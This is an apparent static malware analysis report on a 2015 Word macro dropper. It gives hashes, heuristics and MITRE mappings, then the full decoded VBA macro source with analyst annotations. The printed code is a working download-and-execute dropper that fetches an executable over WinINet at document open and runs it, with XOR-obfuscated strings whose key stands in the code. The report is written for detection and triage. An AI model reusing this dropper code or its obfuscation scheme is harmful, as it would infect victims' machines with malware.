Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a934018b9b6ff900…

MALICIOUS

Office (OLE)

74.0 KB Created: 2015-01-19 16:07:00 Authoring application: Microsoft Office Word First seen: 2015-04-05
MD5: 3c5b6d2f565762bb5af3847bc8e5a918 SHA-1: ee48e9c86c2443542e3c36f7bfab9e4d3ca3904a SHA-256: a934018b9b6ff900b391d18b4e9432b1d1322f6ca3bf08ca152472cc144560db
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 — Visual Basic; T1105 — Ingress Tool Transfer

The sample contains VBA macros that call functions imported from wininet.dll, indicating an attempt to download and execute a secondary payload. The AutoOpen macro together with the ClamAV detection 'Doc.Dropper.Agent-1822040' strongly suggests that this file is a dropper. The VBA code appears to be designed to fetch and run additional malicious content.

Heuristics 5

  • ClamAV: Doc.Dropper.Agent-1822040 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-1822040
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set OBJECT099 = CreateObject _
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8030 bytes
SHA-256: 2002b798fdd0c5b5674c335bd6e3164ec2f3aabc524b2b191824d843f2a670bb
Preview script
First 1,000 lines of the extracted script
' --- Module 1: "ThisDocument" (the document's own class module) ---
' olevba concatenates every module it recovers from the VBA project; each
' "Attribute VB_Name" line in this listing starts a new module.  Attribute
' lines are container metadata written by the VBA project, not executable
' statements.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Entry point.  Word runs a procedure named "autoopen" automatically when the
' document is opened with macros enabled (the line matched by heuristic
' OLE_VBA_AUTOOPEN).  It only forwards to HAZ82771 in module "xsdasvsd"; the
' extra hop keeps the real logic out of the document module.
Sub autoopen()
HAZ82771
End Sub

' --- Module 2: "xsdasvsd" — WinINet imports behind renamed aliases ---
' Each Declare binds an obfuscated local name to a real wininet.dll export
' through the Alias clause, so a search for the API names only hits these
' lines.  The #If branch keeps handle types correct on 64-bit Office
' (LongPtr) versus 32-bit (Long).
'   HLUB3U3OP9832222 -> InternetCloseHandle
'   HLUB3U3OP983222  -> InternetOpenA     (creates the session handle)
'   KOOOODAAAAA1     -> InternetReadFile  (reads a chunk of the response)
'   HLUB3U3OP9832    -> InternetOpenUrlA  (opens a URL on the session)
' These imports are the basis for the T1105 (Ingress Tool Transfer) mapping.
Attribute VB_Name = "xsdasvsd"

#If VBA7 And Win64 Then
Public Declare PtrSafe Function HLUB3U3OP9832222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
Public Declare PtrSafe Function HLUB3U3OP983222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
Public Declare PtrSafe Function KOOOODAAAAA1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal cCCc3333 As LongPtr, ByVal HCDNNNDCNNDC As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Public Declare PtrSafe Function HLUB3U3OP9832 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
#Else
Public Declare Function HLUB3U3OP9832222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
Public Declare Function HLUB3U3OP983222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
Public Declare Function KOOOODAAAAA1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal cCCc3333 As Long, ByVal HCDNNNDCNNDC As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Public Declare Function HLUB3U3OP9832 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
#End If



' Second hop of the AutoOpen chain: calls SerpomPoPo (module "HHAKKK") with a
' literal argument that the callee never reads.
Sub HAZ82771()
SerpomPoPo ("LLLAK")
End Sub

' String decoder used for every runtime-built string in this project.
'   AASC21 - XOR key (the callers pass HAZ82772, "mcdmmwkll,x")
'   AASC22 - payload as a string of two-digit hex bytes
' Returns the decoded text.  For byte i (1-based) the key character is
' Mid$(AASC21, (i Mod Len(AASC21)) + 1, 1): the key is consumed starting at
' its 2nd character and cycles.  Easy to reproduce offline when pulling the
' IoCs out of module "HiMiMiIn".
' The heavy use of "_" line continuation splits single statements over many
' lines, which defeats naive line-oriented signatures.
Public Function ISTOP78(AASC21 As String, AASC22 As String) As String
    Dim UUUUS As Long
    Dim UUUUSO As String
    Dim UUUUS0 As Integer
    Dim UUUUS01 As Integer
    ' Loop bound = number of encoded bytes (getLeg is a thin wrapper over Len).
    For UUUUS = 1 _
    To _
    ( _
    getLeg _
    (AASC22) _
    / 2)
        ' Hex pair -> byte value via Val("&H..").
        UUUUS0 = Val("&H" & _
        (Mid$(AASC22, _
        (2 * UUUUS) - 1, 2)))
        ' Key character for this position (cyclic, offset by one).
        UUUUS01 = Asc(Mid$(AASC21, _
        ((UUUUS Mod Len(AASC21)) + 1), 1))
        UUUUSO = UUUUSO + Chr(UUUUS0 Xor UUUUS01)
    Next UUUUS
   ISTOP78 = UUUUSO
End Function

' Wrapper around Len.  Exists only so the loop bound in ISTOP78 does not
' contain the word "Len" on the same line as the hex-decoding logic.
Public Function getLeg(Papapa1 As String) As Integer
getLeg = Len(Papapa1)
End Function


' --- Module 3: "HiMiMiIn" — encoded string table ---
' Every constant except HAZ82772 is a hex string that ISTOP78 XOR-decodes at
' runtime using HAZ82772 as the key.  Decoded offline with that routine:
'   HAZ82776 -> "Shell.Application"         (ProgID used to launch the drop)
'   HAZ82775 -> "\ccdkope1.2.1.b.exe"       (file name; SerpomPoPo prepends
'                                            the FileSystemObject temp folder)
'   HAZ82774 -> an "http://" download URL   (network IoC; obtain it by running
'                                            ISTOP78 offline — not reproduced here)
'   HAZ82773 -> "Scripting.FileSystemObject"
'   HAZ82772 -> the XOR key itself, stored in clear
' The "'* n" lines are the author's own numbering.
Attribute VB_Name = "HiMiMiIn"
'* 1
Public Const HAZ82776 = "300C08011B452D1C5C1404000519041805"

'*2
Public Const HAZ82775 = "3F070E091C041C091D565F4D55430F590E1409"
'*3
Public Const HAZ82774 = "0B10191D4D44431B184F085715595F44450403411D1D0203084303460302401103064A09085801031F440D0C4C535943121309"
'*4
Public Const HAZ82773 = "30071F04071F05024B562B0A08083E0E18180941370F09010E19"
'*5
Public Const HAZ82772 = "mcdmmwkll,x"









' --- Module 4: "HHAKKK" — the dropper's orchestration routine ---
Attribute VB_Name = "HHAKKK"


' Drops and runs the payload.  Sequence:
'   1. Scripting.FileSystemObject -> temporary folder
'   2. drop path = temp folder & decoded file name (HAZ82775)
'   3. delete any stale copy, download decoded URL (HAZ82774) to the drop path
'   4. Shell.Application.Open(drop path) -> the downloaded file executes
' Trombon is never used.  This module has no Option Explicit, so HAZ82767,
' SSSS and SASASA are implicitly declared Variants.  Every
' "For x = 0 To 0 / If x = 5 Then End / Next x" triple is dead padding: the
' loop body runs once with x = 0, so "End" (which would stop VBA) is never
' reached.  Detection angle: WINWORD writing an .exe to the temp folder and
' then spawning it.
Sub _
SerpomPoPo(Trombon As String)
'* -_-)(CAAdvVVDVSRU|IU
Dim _
OBJECT099


' ISTOP78(HAZ82772, HAZ82773) decodes to "Scripting.FileSystemObject"
' (this is the line matched by heuristic OLE_VBA_CREATEOBJ).
Set OBJECT099 = CreateObject _
(ISTOP78 _
(HAZ82772, HAZ82773))
Dim HAZ82768
' FileSystemObject.GetSpecialFolder(2) is the TemporaryFolder constant.
Const HAZ82768ID = 2
Dim cddssejuuk As Integer
For cddssejuuk = 0 To 0
If cddssejuuk = 5 Then End
Next cddssejuuk
Set HAZ82768 = OBJECT099.GetSpecialFolder _
(HAZ82768ID)
Dim chdhaAAAAAi93 As Integer
For chdhaAAAAAi93 = 0 To 0
If chdhaAAAAAi93 = 5 Then End
Next chdhaAAAAAi93
' Drop path: the Folder object (its default property is the path) & the
' decoded "\<name>.exe" from HAZ82775.
HAZ82767 = HAZ82768 & ISTOP78 _
(HAZ82772, HAZ82775)
Dim hiaopen847 As Integer
For hiaopen847 = 0 To 0
If hiaopen847 = 5 Then End
Next hiaopen847
' A second, redundant FileSystemObject instance replaces the first.
Set OBJECT099 = CreateObject _
(ISTOP78 _
(HAZ82772, HAZ82773))
Dim BnBnHsssssgs346 As Integer
For BnBnHsssssgs346 = 0 To 0
If BnBnHsssssgs346 = 5 Then End
Next BnBnHsssssgs346
' Remove a previous copy so the download below writes a fresh file.
If OBJECT099.FileExists _
(HAZ82767) Then
OBJECT099. _
DeleteFile HAZ82767
End If
' Downloader (module "VVDDD"): decoded URL -> drop path.  The Boolean result
' is discarded (empty If), so execution continues even if the fetch failed.
If HLUB3U3OP983(ISTOP78 _
(HAZ82772, HAZ82774), HAZ82767) Then
End If
' SSSS is never assigned anywhere; noise.
Set SSSS = Nothing
' Empty FileExists check; also noise.
If OBJECT099. _
FileExists _
(HAZ82767) Then
End If
' ISTOP78(HAZ82772, HAZ82776) decodes to "Shell.Application"; .Open on the
' dropped file launches it as a child of the Office process.
Set SASASA = CreateObject _
(ISTOP78 _
(HAZ82772, HAZ82776))
SASASA.Open HAZ82767
End Sub


' --- Modules "SoaO" and "Class2": attribute headers only, no code recovered ---
' A VB_Base with two GUIDs (SoaO) is the form a UserForm/designer module
' carries; {FCFB3D2A-...} (Class2) is the generic class-module base.  Nothing
' in the executable modules references either name, so they appear to be
' empty filler; the same pattern recurs at the end of the listing.
Attribute VB_Name = "SoaO"
Attribute VB_Base = "0{77A09B64-6428-4F9C-A966-1AA1B7D7D76D}{70920E63-92B3-4621-A6FB-678A4BC13318}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

' --- Module 5: "VVDDD" — the downloader (Option Explicit: all names declared) ---
Attribute VB_Name = "VVDDD"
Option Explicit


' Read-buffer size handed to InternetReadFile (bytes per chunk).
Private Const CAS89K01Mmah872 = 8162
' User-Agent passed to InternetOpenA.  A fixed, unusual UA string like this is
' a usable network detection artifact for the sample.
Private Const CAS89K01Mmah871 As String = "HnahHnsnak00"
' dwAccessType for InternetOpenA: 1 = INTERNET_OPEN_TYPE_DIRECT (no proxy).
Private Const CAS89K01Mmah999 = 1
' dwFlags for InternetOpenUrlA: &H4000000 = INTERNET_FLAG_NO_CACHE_WRITE, so
' the fetched payload is not left in the WinINet cache.
Private Const cCCc = &H4000000
' Downloader: fetches sURL with WinINet and writes the response body to
' sFileName.  Returns True only when at least one byte was received (lddta
' non-zero); False if InternetOpenA or InternetOpenUrlA fails or the body is
' empty.  Triage notes: the HTTP client is WinINet inside the Office process
' (no PowerShell/certutil), using the fixed User-Agent CAS89K01Mmah871, and
' the body is fully buffered in memory before a single binary write to disk.
Public Function HLUB3U3OP983(ByVal sURL As String, ByVal sFileName As String) As Boolean
    ' Handle variables sized to match the Declare statements in module "xsdasvsd".
    #If VBA7 And Win64 Then
        Dim HCDNNNDCNNDC2 As LongPtr, CAS89K01Mmah873 As LongPtr
    #Else
        Dim HCDNNNDCNNDC2 As Long, CAS89K01Mmah873 As Long
    #End If
    Dim CDSFDFD As Long ' bytes returned by the most recent InternetReadFile
    ' HCDNNNDCNNDC: fixed-length read buffer (CAS89K01Mmah872 chars);
    ' CCEWGREHRHERHER33: accumulates the whole response body.
    Dim HCDNNNDCNNDC As String * CAS89K01Mmah872, CCEWGREHRHERHER33 As String
    Dim EFEWFWEFWEFWEF As Integer, lddta As Double ' file number / received length
    ' InternetOpenA(agent, accessType, proxy, proxyBypass, flags)
    HCDNNNDCNNDC2 = HLUB3U3OP983222(CAS89K01Mmah871, CAS89K01Mmah999, vbNullString, vbNullString, 0)
    If HCDNNNDCNNDC2 = 0 Then
        Exit Function
    End If
    ' InternetOpenUrlA(session, url, headers, headersLength, flags, context)
    CAS89K01Mmah873 = HLUB3U3OP9832(HCDNNNDCNNDC2, sURL, vbNullString, 0, cCCc, 0)
    If CAS89K01Mmah873 = 0 Then
        lddta = 0
    Else
        ' First read.  Note the ENTIRE fixed-length buffer is copied here, not
        ' only CDSFDFD bytes, so a short first chunk appears to carry buffer
        ' padding into the written file — worth remembering when comparing the
        ' dropped file's hash with the served payload.
        KOOOODAAAAA1 CAS89K01Mmah873, HCDNNNDCNNDC, CAS89K01Mmah872, CDSFDFD
        CCEWGREHRHERHER33 = HCDNNNDCNNDC
        ' Subsequent reads append only the bytes actually returned, until
        ' InternetReadFile reports 0 (end of body).
        Do While CDSFDFD <> 0
            KOOOODAAAAA1 CAS89K01Mmah873, HCDNNNDCNNDC, CAS89K01Mmah872, CDSFDFD
            
            ' Dead-code padding (loop runs once with value 0; "End" is
            ' unreachable).  Same pattern as in SerpomPoPo.
            Dim HhhhhHHuuU73772 As Integer
For HhhhhHHuuU73772 = 0 To 0
If HhhhhHHuuU73772 = 5 Then End
Next HhhhhHHuuU73772
            
            CCEWGREHRHERHER33 = CCEWGREHRHERHER33 + Mid(HCDNNNDCNNDC, 1, CDSFDFD)
        Loop
        ' lddta = total length received; also serves as the success flag.
        lddta = Len(CCEWGREHRHERHER33): EFEWFWEFWEFWEF = FreeFile
        ' Write the buffered body to sFileName in one Put (binary, write-locked).
        Open sFileName _
        For Binary _
        Access Write _
        Lock Write _
        As #EFEWFWEFWEFWEF
        Put #EFEWFWEFWEFWEF, _
        , CCEWGREHRHERHER33
        ':
        
        ' Dead-code padding, as above.
        Dim ssdcdcdsDDDDD As Integer
For ssdcdcdsDDDDD = 0 To 0
If ssdcdcdsDDDDD = 5 Then End
Next ssdcdcdsDDDDD
        Close #EFEWFWEFWEFWEF
    End If
    ' InternetCloseHandle on both handles (the URL handle may still be 0 here).
    HLUB3U3OP9832222 CAS89K01Mmah873
    HLUB3U3OP9832222 HCDNNNDCNNDC2
    CCEWGREHRHERHER33 = ""
    If lddta Then
        HLUB3U3OP983 = True
    End If
End Function



' --- Modules "A1", "A2", "A3", "UserForm1": attribute headers only ---
' No code was recovered for any of them and nothing in the executable modules
' references these names; they appear to be empty filler modules that bulk up
' the VBA project.
Attribute VB_Name = "A1"

Attribute VB_Name = "A2"
Attribute VB_Base = "0{C664A3F6-5364-4EC7-AC31-AC2FD6FDA9A4}{FE0ACA1C-83E3-4D10-9641-C615707BCC5E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "A3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{9F39FB49-722F-4F81-8357-EBE584D86D38}{9BE7A8EB-B4FD-44AB-AE97-BEB270C60C8F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False